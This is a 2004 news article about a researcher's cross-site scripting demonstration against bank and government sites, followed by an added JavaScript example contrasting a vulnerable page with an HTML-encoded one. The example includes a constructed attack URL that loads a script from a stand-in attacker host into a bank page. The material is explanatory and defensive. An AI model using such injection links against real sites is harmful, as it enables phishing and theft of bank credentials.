A new vulnerability makes it easier for fraudsters to pass off content from bogus websites as the real thing
Published:
21 July 2004, Wednesday
Using a variant of well-known cross-site scripting (XSS) attacks, British web developer and security researcher Sam Greenhalgh was able to inject JavaScript from his own website into pages generated by NatWest, Mastercard and Barclays. Even the website of GCHQ, Britain's electronic eavesdropping agency, can be overlaid with bogus content, Greenhalgh shows.
Since the demo was first published late last month, MasterCard and Barclays have blocked the exploit route. This is just as well, as both have recently announced initiatives to combat phishing, apparently without first ensuring that their own houses were in order. The continued vulnerability of other sites, such as NatWest's, is a cause for serious concern, because it could help fraudsters make their scams appear more plausible: the injected script runs in a page served from the bank's own domain, so the address bar and certificate a user checks both look legitimate.
Security firm Netcraft warns: "Having the ability to run their code from the financial institution's own site is a big step forward for fraudsters, as it makes their attack much more plausible. It will almost certainly lead fraudsters to seek out banking sites vulnerable to cross site scripting as a refinement on current phishing attacks which depend upon obscuring the true location of a window prompting for bank account authentication details."
"The technique works equally well over SSL, and so offers fraudsters the enticing opportunity of having a phishing attack delivered over SSL with the attacker's code being served as part of a url from the bona fide bank's own secure server," it adds.
The attacks Greenhalgh demonstrates arise from well-documented cross-site scripting risks: a page reflects attacker-controlled input (typically a URL parameter) into its HTML without encoding it, so script supplied in a link is executed in the bank site's origin. Declaring a self-interest, Netcraft advises companies to carry out more application testing. Other vendors promote digital certificates, though a certificate does nothing against this class of attack, since the bogus content is delivered over the bank's own genuine connection.
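The following is an added illustration, not code from the article or from any of the sites it names, of the reflected cross-site scripting pattern described above: a server-side page that echoes a URL parameter straight into its HTML, beside the hardened version that HTML-encodes it first. The page path, the `user` parameter, the hostnames `bank.example` and `attacker.example` and the script name `phish.js` are all hypothetical, and the attack link is constructed here for the demonstration.

```javascript
// Added example (not from the article): reflected XSS in a bank-style page that
// echoes a query parameter, beside the hardened form. All names are hypothetical.

// Minimal HTML encoder: the five characters that let text break out of an
// HTML text node or attribute value become entities.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Vulnerable: untrusted input is interpolated directly into the response body,
// so "<script ...>" in the parameter becomes live markup in the bank's page.
function renderVulnerable(user) {
  return `<html><body><h1>Welcome, ${user}</h1><p>Please log in.</p></body></html>`;
}

// Hardened: the same page, but the input is encoded before interpolation, so the
// browser renders the payload as literal text instead of executing it.
function renderSafe(user) {
  return `<html><body><h1>Welcome, ${escapeHtml(user)}</h1><p>Please log in.</p></body></html>`;
}

// Pull one query parameter out of a request URL, as the server would see it
// (percent-decoding included). The base host is hypothetical.
function queryParam(url, name) {
  return new URL(url, 'https://bank.example').searchParams.get(name) ?? '';
}

// Constructed attacker link. The script is fetched from the attacker's host, but
// it runs inside a page served by the bank's own origin, over the bank's own SSL.
const ATTACK_URL =
  'https://bank.example/welcome?user=' +
  encodeURIComponent('<script src="https://attacker.example/phish.js"></script>');

// Crude tester's check over rendered output: did a raw <script tag survive?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Run the constructed link through both renderers.
const payload = queryParam(ATTACK_URL, 'user');
console.log('vulnerable page contains live script tag:', containsScriptTag(renderVulnerable(payload)));
console.log('hardened page contains live script tag:  ', containsScriptTag(renderSafe(payload)));
```

The check in `containsScriptTag` is deliberately simple; real testing must also cover event-handler attributes, `javascript:` URLs and attribute-context injection, which is why output encoding has to be context-aware rather than a single regex.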
Source:
theregister.co.uk